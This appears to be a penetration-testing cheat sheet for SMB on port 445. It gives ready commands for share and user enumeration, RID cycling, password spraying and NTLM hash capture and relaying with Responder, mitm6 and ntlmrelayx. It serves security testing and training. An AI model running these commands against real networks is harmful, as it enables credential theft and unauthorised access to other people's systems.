Notes
| Alternative Ports |
|---|
| 445 TCP (SMB over TCP) |
Service Description
SMB (Server Message Block) over TCP (port 445) is used for file and printer sharing, named pipes, remote management, and authentication. Widely used in Windows environments.
Info
Windows cannot change from port 445 — it’s hardcoded for SMB.
Note
HTTP-based restrictions (e.g., in Tomcat) can sometimes be bypassed using SMB share UPN paths.
Warning
SMB null sessions and misconfigurations can expose domain-level data including user lists, shares, policies, and potentially hashes.
Tools & Exploits
Enumeration & Access
List Open Shares
smbclient -N -L \\10.10.10.10
smbmap -H 10.10.10.10 -L -u "" -p ""
enum4linux 10.10.10.10Connect to Share
smbclient -N \\10.10.10.10\[sharename]
smbclient \\10.10.10.10\[Share] -U [user] -W [domain]Mount Share (Linux)
mount.cifs //10.10.10.10/[Share] /mnt/share -o user=[user],domain=[domain],sec=ntlmsspRID Cycling / SID Enumeration
enum4linux -a -u [user] -p 'Password@123' -w [domain] -r 10.10.10.10Password Spray
crackmapexec smb 10.10.10.10 -u users.txt -p Password123 --continue-on-successScanner Modules
nmap
nmap -p445 --script smb-enum-shares,smb-enum-users,smb-os-discovery,smb-security-mode,smb2-capabilities 10.10.10.10Metasploit
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_versionImpacket
rpcdump.py @10.10.10.10
smbclient.py [domain]/[user]@10.10.10.10
lookupsid.py [domain]/[user]@10.10.10.10Responder & Relaying
Responder (LLMNR/NBT-NS Poisoning)
responder -I eth0Captures NTLMv1/v2 hashes from network broadcasts.
NTLM Relaying (ntlmrelayx)
ntlmrelayx.py -tf targets.txt -smb2supportRelay captured hashes to internal SMB services for access or privilege escalation.
mitm6 (IPv6 spoofing for relay setup)
mitm6 -i eth0Injects rogue IPv6 config and redirects traffic to Responder automatically.
Proxychains (relay via pivot)
proxychains responder -I tun0
proxychains ntlmrelayx.py -tf targets.txt -smb2supportUseful when operating through SOCKS proxy or redirectors.
References
- https://book.hacktricks.wiki/network-services-pentesting/smb-pentesting
- https://learn.microsoft.com/en-us/windows-server/storage/file-server/troubleshoot/detect-enable-and-disable-smbv1-v2-v3?tabs=server
- https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing
- https://github.com/dirkjanm/mitm6
- https://github.com/fox-it/ntlmrelayx
- https://github.com/lgandx/Responder